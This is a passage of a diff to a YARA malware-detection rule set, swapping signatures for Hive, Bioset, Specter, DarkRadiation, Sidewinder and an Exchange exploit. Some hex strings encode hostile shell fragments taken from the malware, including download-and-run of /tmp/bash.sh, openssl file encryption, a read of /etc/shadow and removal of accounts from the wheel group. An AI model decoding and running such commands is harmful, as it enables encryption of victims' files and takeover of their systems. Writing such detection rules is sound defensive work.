-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-10-29/Hive/RAN_ELF_Hive_Oct_2021_1.yara#L1-L19"
+		id = "2efd58a1-e5c3-5596-b5fd-f6e2fe0ab620"
+		date = "2021-11-21"
+		modified = "2021-11-21"
+		reference = "https://gist.github.com/testanull/0188c1ae847f37a70fe536123d14f398"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-21/EXP_CVE_2021_42321_Nov_2021_1.yara#L1-L19"
 		license_url = "N/A"
-		logic_hash = "47ccf3b825521986070dba92194d5937289c0335b922537ea3242c4afb2be237"
-		score = 60
-		quality = 35
-		tags = "FILE"
-		hash1 = "6a0449a0b92dc1b17da219492487de824e86a25284f21e6e3af056fe3f4c4ec0"
-		hash2 = "bdf3d5f4f1b7c90dfc526340e917da9e188f04238e772049b2a97b4f88f711e3"
+		logic_hash = "bf45f240875f3c3ab729fe623b6c97d0540c0d7d3e9b2e4beb88af6922f8a643"
+		score = 50
+		quality = 67
+		tags = "CVE-2021-42321, FILE"
+		hash1 = "537744916ce2e78748d301901c679307e8159101f3b194add89f6e1dfbf62c32"
 		tlp = "white"
+		level = "Experimental"
 		adversary = "-"
-		level = "experimental"
 
 	strings:
-		$s1 = { 49 3b 66 10 76 ?? 48 83 ec ?? 48 89 6c 24 ?? 48 8d 6c 24 ?? 48 8b [3] 48 }
-		$s2 = { 48 89 f8 48 89 f3 48 83 ec 27 48 83 e4 f0 48 89 44 24 10 48 89 5c 24 18 48 8d 3d 41 [2] 00 48 8d 9c 24 68 00 ff ff 48 89 5f 10 48 89 5f 18 48 89 1f 48 89 67 08 b8 00 00 00 00 0f a2 89 c6 83 f8 00 74 33 81 fb 47 65 6e 75 75 1e 81 fa 69 6e 65 49 75 16 81 f9 6e 74 65 6c 75 0e c6 05 [3] 00 01 c6 05 [3] 00 01 b8 01 00 00 00 0f a2 89 05 [3] 00 48 8b 05 }
-		$s3 = { 66 0f 38 dc ?? 66 0f 38 dc ?? 66 0f 38 dc ?? 66 0f 38 dc ?? 66 0f 38 dc ?? 66 0f 38 dc }
-		$s4 = { 00 00 48 8b ac 24 68 02 00 00 48 81 c4 70 02 00 00 c3 ?? 80 ?? 0e [6] 48 8b [2] 48 }
+		$s1 = { 41 41 45 41 41 41 44 2f 2f 2f 2f 2f 41 51 41 41 41 41 41 41 41 41 41 4d 41 67 41 41 41 46 35 4e 61 57 4e 79 62 }
+		$s2 = "/ews/exchange.asmx" ascii
+		$s3 = { 48 74 74 70 4e 74 6c 6d 41 75 74 68 28 27 25 73 27 20 25 20 28 55 53 45 52 29 }
+		$s4 = { 22 55 73 65 72 2d 41 67 65 6e 74 22 3a 20 22 45 78 63 68 61 6e 67 65 53 65 72 76 69 63 65 73 43 6c 69 65 6e 74 }
+		$s5 = { 6d 56 6a 64 45 52 68 64 47 46 51 63 6d 39 32 61 57 52 6c 63 6a 34 4e 43 69 41 67 49 43 41 38 54 32 4a 71 5a 57 4e 30 52 47 46 30 59 56 42 79 62 33 5a 70 5a 47 56 79 49 48 67 36 53 32 56 35 50 53 4a 7a 5a 58 52 4e 5a 58 52 6f 62 32 51 69 49 45 39 69 61 6d 56 6a 64 45 6c 75 63 33 52 68 62 6d 4e 6c 50 53 4a 37 65 44 70 54 64 47 46 30 61 57 4d 67 59 7a 70 44 62 32 35 6d 61 57 64 31 63 6d 46 30 61 57 }
 
 	condition:
-		uint32( 0 ) == 0x464C457F and filesize > 20KB and all of ( $s* )
+		filesize > 3KB and 4 of them
 }
-rule ARKBIRD_SOLG_MAL_ELF_Bioset_Jul_2021_1 : FILE
+rule ARKBIRD_SOLG_APT_Sidewinder_Nov_2020_1 : FILE
 {
 	meta:
-		description = "Detect the Bioset malware"
+		description = "Detect Sidewinder DLL decoder algorithm"
 		author = "Arkbird_SOLG"
-		id = "1b95c3df-7543-521c-a28b-d540ad0bd648"
-		date = "2021-07-02"
-		modified = "2021-07-05"
-		reference = "https://twitter.com/JAMESWT_MHT/status/1409848815948111877"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-04/Bioset/MAL_ELF_Bioset_Jul_2021_1.yara#L1-L26"
+		id = "9e948949-f38d-5a76-a34c-965ec9be070d"
+		date = "2020-11-14"
+		modified = "2020-11-15"
+		reference = "https://twitter.com/hexfati/status/1325397305051148292"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-11-15/APT_SideWinder_Nov_2020_1.yar#L1-L12"
 		license_url = "N/A"
-		logic_hash = "b5ba7f4517f07d8657cbd54695cad88d8c2f263ee010bd70c4a05433b2927576"
+		logic_hash = "661eb5510ff0aa59b38b2c023653f0a23867a2813d854fbd0a7a6b657d9ba671"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "3afe2ec273608be0b34b8b357778cc2924c344dd1b00a84cf90925eeb2469964"
-		hash2 = "3de97c2b211285022a34a62b536cef586d987939d40d846930c201d010517a10"
-		hash3 = "b00157dbb371e8abe19a728104404af61acc3c5d4a6f67c60e694fe0788cb491"
-		hash4 = "7fa37dd67dcd04fc52787c5707cf3ee58e226b98c779feb45b78aa8a249754c7"
-		hash5 = "79e93f6e5876f31ddc4a6985b290ede6a2767d9a94bdf2057d9c464999163746"
-		tlp = "White"
-		adversary = "-"
+		hash1 = "8d7ad2c603211a67bb7abf2a9fe65aefc993987dc804bf19bafbefaaca066eaa"
 
 	strings:
-		$s1 = "exec bash --login" fullword ascii
-		$s2 = { 55 48 89 e5 53 48 83 ec 48 48 89 7d b8 48 c7 45 d8 [2] 40 00 48 c7 45 d0 00 00 00 00 c7 45 e8 00 00 00 00 c7 45 ec 00 00 00 00 eb 30 48 8b 05 [2] 20 00 8b 55 ec 48 63 d2 48 c1 e2 03 48 01 d0 48 8b 00 48 89 c7 e8 ?? fa ff ff 89 c2 8b 45 e8 01 d0 83 c0 01 89 45 e8 83 45 ec 01 48 8b 05 [2] 20 00 8b 55 ec 48 63 d2 48 c1 e2 03 48 01 d0 48 8b 00 48 85 c0 75 b4 48 8b 05 [2] 20 00 8b 55 ec 48 63 d2 48 c1 e2 03 48 83 ea 08 48 01 d0 48 8b 18 48 8b 05 [2] 20 00 8b 55 ec 48 63 d2 48 c1 e2 03 48 83 ea 08 48 01 d0 48 8b 00 48 89 c7 e8 ?? fa ff ff 48 83 c0 01 48 01 d8 48 89 45 d0 8b 45 e8 48 98 48 89 c7 e8 ?? fb ff ff 48 89 45 e0 c7 45 ec 00 00 00 00 eb 74 48 8b 05 [2] 20 00 8b 55 ec 48 63 d2 48 c1 e2 03 48 01 d0 48 8b 10 48 8b 45 e0 48 89 d6 48 89 c7 e8 ?? f9 ff ff 48 8b 05 [2] 20 00 8b 55 ec 48 63 d2 48 c1 e2 03 48 01 d0 48 8b 00 48 89 c7 e8 ?? f9 ff ff 89 45 cc 8b 45 cc 48 98 48 83 c0 01 48 01 45 e0 48 8b 05 [2] 20 00 8b 55 ec 48 63 d2 48 c1 e2 03 48 01 c2 48 8b 45 e0 48 89 02 83 45 ec 01 48 8b 05 [2] 20 00 8b 55 ec 48 63 d2 48 c1 e2 03 48 01 d0 48 8b 00 }
-		$s3 = "amcsh_connect" fullword ascii
-		$s4 = "GOT HAHA: %d" fullword ascii
-		$s5 = { 52 65 63 76 65 64 20 74 65 72 6d 20 65 6e 76 20 76 61 72 3a 20 25 73 00 77 69 6e 3a 25 64 2c 25 64 }
-		$s6 = { 55 48 89 e5 48 81 ec f0 20 00 00 89 bd 1c df ff ff 48 c7 45 f0 [2] 40 00 48 8d 85 20 df ff ff be 01 20 00 00 48 89 c7 e8 ?? fa ff ff 48 8d b5 28 ff ff ff 48 8d 85 2c ff ff ff 41 b8 00 00 00 00 b9 00 00 00 00 ba 00 00 00 00 48 89 c7 e8 ?? fa ff ff 85 c0 79 2a e8 ?? f8 ff ff 8b 00 89 c7 e8 ?? fa ff ff 48 89 c6 bf [2] 40 00 b8 00 00 00 00 e8 26 fc ff ff b8 01 00 00 00 e9 f8 05 00 00 8b 85 28 ff ff ff 89 c7 e8 ?? fa ff ff 48 89 45 e8 48 83 7d e8 00 75 0a b8 01 00 00 00 e9 d6 05 00 00 bf [2] 40 00 e8 ?? f9 ff ff 48 8d 95 20 df ff ff 8b 85 1c df ff ff 48 89 d6 89 c7 e8 ?? 17 00 00 89 45 fc 83 7d fc 00 79 2a e8 [2] ff ff 8b 00 89 c7 e8 ?? fa ff ff 48 89 c6 bf [2] 40 00 b8 00 00 00 00 e8 b0 fb ff ff }
-		$s7 = { 8b 45 fc 48 63 d0 8b 85 2c ff ff ff 48 8d 8d 20 df ff ff 48 89 ce 89 c7 e8 ?? f3 ff ff 89 45 fc 8b 45 fc 89 c6 bf [2] 40 00 b8 00 00 00 00 e8 f0 f6 ff ff 83 7d fc }
-		$s8 = { 55 48 89 e5 53 48 81 ec e8 00 00 00 48 89 b5 48 ff ff ff 48 89 95 50 ff ff ff 48 89 8d 58 ff ff ff 4c 89 85 60 ff ff ff 4c 89 8d 68 ff ff ff 84 c0 74 23 0f 29 85 70 ff ff ff 0f 29 4d 80 0f 29 55 90 0f 29 5d a0 0f 29 65 b0 0f 29 6d c0 0f 29 75 d0 0f 29 7d e0 48 89 bd 18 ff ff ff 48 8b 05 [2] 20 00 48 85 c0 75 16 be [2] 40 00 bf [2] 40 00 e8 ?? fd ff ff 48 89 05 [2] 20 00 c7 85 20 ff ff ff 08 00 00 00 c7 85 24 ff ff ff 30 00 00 00 48 8d 45 10 48 89 85 28 ff ff ff 48 8d 85 40 ff ff ff 48 89 85 30 ff ff ff 48 8b 05 [2] 20 00 48 8d 95 20 ff ff ff 48 8b 8d 18 ff ff ff 48 89 ce 48 89 c7 e8 ?? fd ff ff 48 c7 85 38 ff ff ff [2] 40 00 48 8b 1d [2] 20 00 48 8b 85 38 ff ff ff 48 89 c7 e8 ?? fb ff ff 48 89 c6 48 8b 85 38 ff ff ff 48 89 d9 ba 01 00 00 00 48 89 c7 e8 ?? fd ff ff 48 8b 05 [2] 20 00 48 89 c7 e8 ?? fc ff ff 48 81 c4 e8 00 00 00 5b }
+		$s = { 13 30 05 00 ?? 00 00 00 01 00 00 11 ?? ?? 00 00 ?? ?? ?? 00 00 [30-80] 2B 16 07 08 8F 1? }
 
 	condition:
-		uint32( 0 ) == 0x464c457f and filesize > 10KB and 6 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 3KB and $s
 }
-rule ARKBIRD_SOLG_MAL_ELF_Specter_Jul_2021_1 : FILE
+rule ARKBIRD_SOLG_RAN_ELK_Darkradiation_Jul_2021_1 : FILE
 {
 	meta:
-		description = "Detect the Specter malware"
+		description = "Detect the DarkRadiation ransomware"
 		author = "Arkbird_SOLG"
-		id = "24237a56-2717-5efc-9bfb-9ab6d87e082b"
-		date = "2021-07-02"
+		id = "13d77ecc-14ab-54ce-9eec-2d614f5ae8e4"
+		date = "2021-07-03"
 		modified = "2021-07-05"
-		reference = "https://twitter.com/JAMESWT_MHT/status/1410870749473148930"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-04/Specter/MAL_ELF_Specter_Jul_2021_1.yara#L1-L20"
+		reference = "https://bazaar.abuse.ch/browse/tag/DarkRadiation/"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-04/DarkRadiation/RAN_ELK_DarkRadiation_Jul_2021_1.yara#L1-L25"
 		license_url = "N/A"
-		logic_hash = "de737f051d34edb2219e77c0d4f0239b95bad9983ee5e435d6ee9741525816f0"
+		logic_hash = "6fbc6eed7dd7f92af0cd8b3b2726636a64dc8de0b795b176169817994f44d4fa"
 		score = 75
-		quality = 75
+		quality = 61
 		tags = "FILE"
-		hash1 = "0bff46518b35ddfe37f4a7820286aab829d81f1480d9eeca5aaedc9ceda6724f"
-		hash2 = "be97d7ae3b2d876f027d99d8d61dbca92513f4975336c2ebc26cf8a0839b67b6"
+		hash1 = "1c2b09417c1a34bbbcb8366c2c184cf31353acda0180c92f99828554abf65823"
+		hash2 = "d0d3743384e400568587d1bd4b768f7555cc13ad163f5b0c3ed66fdc2d29b810"
+		hash3 = "e380c4b48cec730db1e32cc6a5bea752549bf0b1fb5e7d4a20776ef4f39a8842"
 		tlp = "White"
-		adversary = "Specter"
+		adversary = "FERRUM"
 
 	strings:
-		$s1 = { 41 57 41 89 cf 41 56 4d 89 c6 41 55 41 89 f5 be 01 00 00 00 41 54 49 89 fc bf 02 00 00 00 55 89 d5 31 d2 53 48 83 ec 38 48 c7 44 24 20 00 00 00 00 48 c7 44 24 28 00 00 00 00 e8 cf bf fe ff be 03 00 00 00 89 c3 89 c7 31 c0 e8 1f c4 fe ff 80 cc 08 be 04 00 00 00 89 df 89 c2 31 c0 e8 0c c4 fe ff 48 8d 74 24 20 89 ea 89 df 66 c1 ca 08 66 89 54 24 22 ba 10 00 00 00 66 c7 44 24 20 02 00 44 89 e8 31 ed 0f c8 89 44 24 24 e8 ae be fe ff 85 c0 0f 84 c5 00 00 00 e8 11 c0 fe ff 83 38 73 48 89 c5 74 07 89 df e8 12 b8 fe ff 8b 6d 00 83 fd 73 0f 85 a5 00 00 00 bf 1c 00 00 00 e8 dc b9 fe ff 48 85 c0 48 89 c2 0f 84 8c 00 00 00 44 89 68 14 89 58 18 4d 8d 6c 24 60 44 89 78 10 41 0f 10 06 4c 89 ef 4d 8d 74 24 50 0f 11 02 0f 29 04 24 48 89 04 24 e8 74 c2 fe ff bf 18 00 00 00 e8 b2 b5 07 00 48 85 c0 74 17 48 8b 14 24 48 c7 00 00 00 00 00 48 c7 40 08 00 00 00 00 48 89 50 10 4c 89 f6 48 89 c7 e8 9b fe 08 00 4c 89 ef e8 0b c3 fe ff 41 8b bc 24 88 00 00 00 48 8d 4c 24 14 89 da be 01 00 00 00 89 5c 24 18 c7 44 24 14 1d 20 00 80 e8 26 bd fe }
-		$s2 = { 55 31 c0 b9 5d 00 00 00 53 48 89 fb 48 81 ec 48 01 00 00 48 8d 7c 24 4e f3 aa 48 8d 7c 24 4e e8 d2 03 00 00 48 8d bc 24 ab 00 00 00 31 c0 b9 07 00 00 00 48 8d 74 24 28 c7 44 24 30 00 00 00 00 48 c7 44 24 38 00 00 00 00 f3 ab 48 8b 84 24 70 01 00 00 48 8d 7c 24 4e 48 89 44 24 40 48 8d 44 24 30 48 89 44 24 28 e8 36 08 00 00 8b 6c 24 30 85 ed 0f 85 89 00 00 00 48 8b 44 24 40 48 8b 00 48 8b 40 e8 48 39 44 24 38 75 76 48 8d bc 24 c7 00 00 00 31 c0 b9 5d 00 00 00 f3 aa 48 8d bc 24 c7 00 00 00 e8 4d 03 00 00 48 8d bc 24 24 01 00 00 b9 07 00 00 00 89 e8 48 8d 94 24 c7 00 00 00 48 8d 74 24 4e f3 ab 48 8d 7b 18 e8 64 26 00 00 b9 08 00 00 00 48 89 e7 48 8d b4 24 60 01 00 00 f3 a5 48 8d b4 24 c7 00 00 00 89 c2 48 89 df e8 6e fb ff ff 48 8d bc 24 c7 00 00 00 e8 e3 03 00 00 48 8d 7c 24 4e e8 d9 03 00 00 48 81 c4 }
-		$s3 = { 83 fa 03 0f 86 e6 00 00 00 41 57 41 56 41 55 41 54 49 89 cc 55 48 89 fd 53 48 89 f3 48 83 ec 28 66 8b 46 04 44 8b 76 0c 44 8b 3e 66 89 44 24 0c 66 8b 46 06 45 8d 6e 01 44 89 7c 24 08 44 89 74 24 14 66 89 44 24 0e 8b 46 08 4c 89 ef 89 44 24 10 e8 f4 b3 fe ff 48 89 c2 48 89 44 24 18 4c 89 e9 31 c0 48 89 d7 48 8d 73 10 f3 aa 48 89 d7 4c 89 f1 f3 a4 44 89 fe 48 89 ef e8 9b fa ff ff ff c0 74 07 4c 89 e1 31 d2 eb 4b 66 83 7c 24 0e 03 75 21 48 8b 74 24 18 48 8d 54 24 10 48 89 ef e8 d4 f8 ff ff 84 c0 75 0b e8 ad b9 fe ff 8b 00 85 c0 75 18 0f b7 54 24 0c 8b 4c 24 08 4d 89 e0 8b 74 24 10 48 89 ef e8 e1 f8 ff ff 83 f8 73 74 11 4c 89 e1 89 c2 8b 74 24 08 48 89 ef e8 ff fe ff ff 48 83 }
-		$s4 = { 48 8d 05 5a 5f 0b 00 48 89 84 24 80 00 00 00 48 8b 05 cf 75 30 00 be 18 00 00 00 bf 01 00 00 00 ff 10 48 85 c0 48 89 84 24 98 00 00 00 0f 84 fa fc ff ff 4c 8d bc 24 98 00 00 00 48 8b 54 24 60 48 8d 35 00 2b 0b 00 31 c0 4c 89 ff e8 2c ef ff ff 85 c0 0f 85 f4 fb ff ff 49 8b b5 f8 0d 00 00 48 85 f6 0f 84 13 09 00 00 31 ed 41 0f b7 86 ac 03 00 00 66 25 20 40 66 83 f8 20 0f 84 03 09 00 00 80 7c 24 78 00 0f 84 01 07 00 00 49 8b 8e 18 02 00 00 49 8b 96 10 02 00 00 4c 8d 46 06 48 8d 35 a6 2a 0b 00 4c 89 ff 31 c0 e8 ce ee ff ff 85 c0 0f 85 96 fb ff ff 41 0f b7 86 ac 03 00 00 4c 8d 25 42 eb 0a 00 66 25 20 40 66 83 f8 20 0f 84 55 0b 00 00 49 83 bd f8 0e 00 00 00 48 8d 05 25 eb 0a 00 74 0e 49 8b 96 30 04 00 00 48 85 d2 48 0f 45 c2 49 8b 95 68 0c 00 00 48 8d 35 07 eb 0a 00 48 85 d2 74 13 80 3a 00 74 0e 49 8b 96 18 04 00 00 48 85 d2 48 0f 45 f2 49 8b 96 50 04 00 00 48 8d 0d e1 ea 0a 00 48 85 d2 48 0f 44 d1 49 89 d3 48 8b 54 24 50 48 8b 52 20 48 85 d2 48 0f 44 d1 49 89 d2 49 8b 95 50 0d 00 00 48 85 d2 74 13 80 3a 00 74 0e 49 8b 96 10 04 00 00 48 85 d2 48 0f 45 ca 41 f6 85 85 15 00 00 02 48 8d 2d 96 ea 0a 00 74 0e 49 8b 96 28 04 00 00 48 85 d2 48 0f 45 ea 49 8b be 20 04 00 00 48 8d 15 78 ea 0a 00 4d 8b 8e 08 04 00 00 4d 8b 86 38 04 00 00 48 89 4c 24 10 48 8b 8c 24 80 00 00 00 48 89 74 24 28 48 8d 35 f6 23 0b 00 48 85 ff 4c 89 5c 24 20 4c 89 54 24 18 48 0f 44 fa 4d 85 c9 48 89 44 24 30 48 89 7c 24 60 48 8b 7c 24 70 4c 0f 44 ca 4d 85 c0 48 89 6c }
-		$s5 = { 8b 44 24 50 4d 85 ff 4c 89 38 0f 85 12 f8 ff ff e9 dc f9 ff ff 0f 1f 84 00 00 00 00 00 49 83 bd 68 0c 00 00 00 0f 84 bb f7 ff ff 48 8b 05 e3 6f 30 00 49 8b be 18 04 00 00 ff 10 49 8b b5 68 0c 00 00 48 8d 3d ae 26 0b 00 31 c0 49 c7 86 18 04 00 00 00 00 00 00 e8 22 9b 00 00 48 85 c0 49 89 86 18 04 00 00 0f 85 96 f7 ff ff e9 1d f9 ff ff 0f 1f 44 00 00 41 80 bd ea 0e 00 00 00 48 8d 05 01 26 0b 00 48 89 44 24 60 0f 88 2f f6 ff ff 83 fb 07 0f 87 2a 01 00 00 48 8d 05 76 28 0b 00 89 da 48 63 14 90 48 01 d0 ff e0 0f 1f 00 4c 8b 7c 24 50 49 8b 3f e8 e3 fa fe ff 85 c0 0f 85 eb f7 ff ff 49 8b 3f e8 f3 fa fe ff 49 89 47 08 e9 1e f9 ff ff 66 2e 0f 1f 84 00 00 00 00 00 49 8b b6 d0 00 00 00 49 8b bd f0 10 00 00 e8 5d cf 00 00 85 c0 0f 85 91 f9 ff ff 49 8b 86 d8 03 00 00 45 8b 86 98 01 00 00 8b 80 80 00 00 00 a8 02 74 0d 41 81 f8 bb 01 00 00 0f 84 b9 01 00 00 a8 01 74 0a 41 83 f8 50 0f 84 ab 01 00 00 41 0f b6 86 ad 03 00 00 48 8d 0d 2e e7 0a 00 48 8d 15 8a 1c 0b 00 48 8d 3d de 25 0b 00 48 89 ce 83 e0 02 48 8d 05 3c 07 0b 00 48 0f 45 ca 48 8b 54 24 58 48 0f 45 f0 31 c0 e8 14 9a 00 00 49 89 86 38 04 00 00 48 85 c0 0f 85 99 f9 ff ff e9 0f f8 ff ff 48 8d 05 05 25 0b 00 48 89 44 24 60 e9 2f f5 ff ff 48 8d 05 ef 24 0b 00 48 89 44 24 60 e9 1e f5 ff ff 48 8d 05 56 cd 0a 00 48 89 44 24 60 e9 0d f5 ff ff 48 8d 05 d6 24 0b 00 48 89 44 24 60 e9 fc f4 ff ff 48 8d 05 0e d1 0a 00 48 89 44 24 60 e9 eb f4 ff ff 66 2e 0f 1f 84 00 00 00 00 00 49 8b 86 d0 03 00 00 f6 80 80 00 00 00 03 74 28 8d 43 fd 83 f8 01 0f 86 6a 02 00 00 41 f6 85 eb 0e 00 00 01 74 12 49 83 bd f8 14 00 00 ff 0f 84 62 02 00 00 0f 1f 40 00 41 80 a5 68 06 00 00 bf 48 8d 05 44 e6 0a 00 41 f6 85 68 06 00 00 40 48 89 c1 48 8d 05 60 24 0b 00 48 0f 44 c1 48 89 44 24 70 e9 01 f8 ff ff 66 0f 1f 84 00 00 00 00 00 83 7f 18 04 4c 8d 3d f3 0a 0b 00 }
+		$s1 = { 50 41 53 53 5f 44 45 43 3d 24 28 6f 70 65 6e 73 73 6c 20 65 6e 63 20 2d 62 61 73 65 36 34 20 2d 61 65 73 2d 32 35 36 2d 63 62 63 20 2d 64 20 2d 70 61 73 73 20 70 61 73 73 3a 24 50 41 53 53 5f 44 45 20 3c 3c 3c 20 24 31 29 }
+		$s2 = { 72 6d 20 2d 72 66 20 24 50 41 54 48 5f 54 45 4d 50 5f 46 49 4c 45 2f 24 4e 41 4d 45 5f 53 43 52 49 50 54 5f 43 52 59 50 54 }
+		$s3 = { 74 65 6c 65 67 72 61 6d 5f 62 6f 74 2f [5-15] 2d 6f 20 22 2f }
+		$s4 = { 2d 6f 20 22 2f 74 6d 70 2f 62 61 73 68 2e 73 68 22 3b 63 64 20 2f 74 6d 70 3b 63 68 6d 6f 64 20 2b 78 20 62 61 73 68 2e 73 68 3b 2e 2f 62 61 73 68 2e 73 68 3b }
+		$s5 = { 78 61 72 67 73 20 2d 50 20 31 30 20 2d 49 20 46 49 4c 45 20 6f 70 65 6e 73 73 6c 20 65 6e 63 20 2d 61 65 73 2d 32 35 36 2d 63 62 63 20 2d 73 61 6c 74 20 2d 70 61 73 73 20 70 61 73 73 }
+		$s6 = { 78 61 72 67 73 20 2d 50 20 31 30 20 2d 49 20 46 49 4c 45 20 6f 70 65 6e 73 73 6c 20 65 6e 63 20 2d 61 65 73 2d 32 35 36 2d 63 62 63 20 2d 73 61 6c 74 20 2d 70 61 73 73 20 70 61 73 73 3a 24 50 41 53 53 5f 44 45 43 20 2d 69 6e 20 46 49 4c 45 20 2d 6f 75 74 20 46 49 4c 45 2e }
+		$s7 = { 75 73 65 72 6d 6f 64 20 2d 2d 73 68 65 6c 6c 20 2f 62 69 6e 2f 6e 6f 6c 6f 67 69 6e }
+		$s8 = { 67 72 65 70 20 2d 46 20 22 24 22 20 2f 65 74 63 2f 73 68 61 64 6f 77 20 7c 20 63 75 74 20 2d 64 3a 20 2d 66 31 20 7c 20 67 72 65 70 20 2d 76 20 22 [1-15] 22 20 7c 20 78 61 72 67 73 20 2d 49 20 46 49 4c 45 20 67 70 61 73 73 77 64 20 2d 64 20 46 49 4c 45 20 77 68 65 65 6c }
+		$s9 = { 73 79 73 74 65 6d 63 74 6c 20 73 74 6f 70 20 64 6f 63 6b 65 72 20 26 26 20 73 79 73 74 65 6d 63 74 6c 20 64 69 73 61 62 6c 65 20 64 6f 63 6b 65 72 }
 
 	condition:
-		uint32( 0 ) == 0x464c457f and filesize > 100KB and 4 of ( $s* )
+		filesize > 5KB and 5 of ( $s* )
 }
 rule ARKBIRD_SOLG_RAN_ELK_Darkradiation_Jul_2021_3 : FILE
 {
@@ -148994,41 +149763,6 @@ rule ARKBIRD_SOLG_RAN_ELK_Darkradiation_Jul_2021_3 : FILE
 	condition:
 		filesize > 1KB and ( 3 of ( $s* ) or 5 of ( $x* ) or all of ( $y* ) )
 }
-rule ARKBIRD_SOLG_RAN_ELK_Darkradiation_Jul_2021_1 : FILE
-{
-	meta:
-		description = "Detect the DarkRadiation ransomware"
-		author = "Arkbird_SOLG"
-		id = "13d77ecc-14ab-54ce-9eec-2d614f5ae8e4"
-		date = "2021-07-03"
-		modified = "2021-07-05"
-		reference = "https://bazaar.abuse.ch/browse/tag/DarkRadiation/"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-04/DarkRadiation/RAN_ELK_DarkRadiation_Jul_2021_1.yara#L1-L25"
-		license_url = "N/A"
-		logic_hash = "6fbc6eed7dd7f92af0cd8b3b2726636a64dc8de0b795b176169817994f44d4fa"
-		score = 75
-		quality = 61
-		tags = "FILE"
-		hash1 = "1c2b09417c1a34bbbcb8366c2c184cf31353acda0180c92f99828554abf65823"
-		hash2 = "d0d3743384e400568587d1bd4b768f7555cc13ad163f5b0c3ed66fdc2d29b810"
-		hash3 = "e380c4b48cec730db1e32cc6a5bea752549bf0b1fb5e7d4a20776ef4f39a8842"
-		tlp = "White"
-		adversary = "FERRUM"
-
-	strings:
-		$s1 = { 50 41 53 53 5f 44 45 43 3d 24 28 6f 70 65 6e 73 73 6c 20 65 6e 63 20 2d 62 61 73 65 36 34 20 2d 61 65 73 2d 32 35 36 2d 63 62 63 20 2d 64 20 2d 70 61 73 73 20 70 61 73 73 3a 24 50 41 53 53 5f 44 45 20 3c 3c 3c 20 24 31 29 }
-		$s2 = { 72 6d 20 2d 72 66 20 24 50 41 54 48 5f 54 45 4d 50 5f 46 49 4c 45 2f 24 4e 41 4d 45 5f 53 43 52 49 50 54 5f 43 52 59 50 54 }
-		$s3 = { 74 65 6c 65 67 72 61 6d 5f 62 6f 74 2f [5-15] 2d 6f 20 22 2f }
-		$s4 = { 2d 6f 20 22 2f 74 6d 70 2f 62 61 73 68 2e 73 68 22 3b 63 64 20 2f 74 6d 70 3b 63 68 6d 6f 64 20 2b 78 20 62 61 73 68 2e 73 68 3b 2e 2f 62 61 73 68 2e 73 68 3b }
-		$s5 = { 78 61 72 67 73 20 2d 50 20 31 30 20 2d 49 20 46 49 4c 45 20 6f 70 65 6e 73 73 6c 20 65 6e 63 20 2d 61 65 73 2d 32 35 36 2d 63 62 63 20 2d 73 61 6c 74 20 2d 70 61 73 73 20 70 61 73 73 }
-		$s6 = { 78 61 72 67 73 20 2d 50 20 31 30 20 2d 49 20 46 49 4c 45 20 6f 70 65 6e 73 73 6c 20 65 6e 63 20 2d 61 65 73 2d 32 35 36 2d 63 62 63 20 2d 73 61 6c 74 20 2d 70 61 73 73 20 70 61 73 73 3a 24 50 41 53 53 5f 44 45 43 20 2d 69 6e 20 46 49 4c 45 20 2d 6f 75 74 20 46 49 4c 45 2e }
-		$s7 = { 75 73 65 72 6d 6f 64 20 2d 2d 73 68 65 6c 6c 20 2f 62 69 6e 2f 6e 6f 6c 6f 67 69 6e }
-		$s8 = { 67 72 65 70 20 2d 46 20 22 24 22 20 2f 65 74 63 2f 73 68 61 64 6f 77 20 7c 20 63 75 74 20 2d 64 3a 20 2d 66 31 20 7c 20 67 72 65 70 20 2d 76 20 22 [1-15] 22 20 7c 20 78 61 72 67 73 20 2d 49 20 46 49 4c 45 20 67 70 61 73 73 77 64 20 2d 64 20 46 49 4c 45 20 77 68 65 65 6c }
-		$s9 = { 73 79 73 74 65 6d 63 74 6c 20 73 74 6f 70 20 64 6f 63 6b 65 72 20 26 26 20 73 79 73 74 65 6d 63 74 6c 20 64 69 73 61 62 6c 65 20 64 6f 63 6b 65 72 }
-
-	condition:
-		filesize > 5KB and 5 of ( $s* )
-}
 rule ARKBIRD_SOLG_RAN_ELK_Darkradiation_Jul_2021_2 : FILE
 {
 	meta:
@@ -149066,1260 +149800,1251 @@ rule ARKBIRD_SOLG_RAN_ELK_Darkradiation_Jul_2021_2 : FILE
 	condition:
 		filesize > 1KB and 6 of ( $s* )
 }
-rule ARKBIRD_SOLG_APT_APT_C_23_Micropsia_Mar_2021_2 : FILE
+rule ARKBIRD_SOLG_MAL_ELF_Specter_Jul_2021_1 : FILE
 {
 	meta:
-		description = "Detect Micropsia used by APT-C-23 (Build 2020)"
+		description = "Detect the Specter malware"
 		author = "Arkbird_SOLG"
-		id = "cdd95b35-09b4-5412-bd86-55c2e7523d3e"
-		date = "2021-03-31"
-		modified = "2021-03-31"
-		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-03-31/APT-C-23/APT_APT_C_23_Micropsia_Mar_2021_2.yar#L1-L26"
+		id = "24237a56-2717-5efc-9bfb-9ab6d87e082b"
+		date = "2021-07-02"
+		modified = "2021-07-05"
+		reference = "https://twitter.com/JAMESWT_MHT/status/1410870749473148930"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-04/Specter/MAL_ELF_Specter_Jul_2021_1.yara#L1-L20"
 		license_url = "N/A"
-		logic_hash = "a00091161ec69c9885e983117e2b424f860bfbab2551ea23b74c37fc062850b9"
-		score = 50
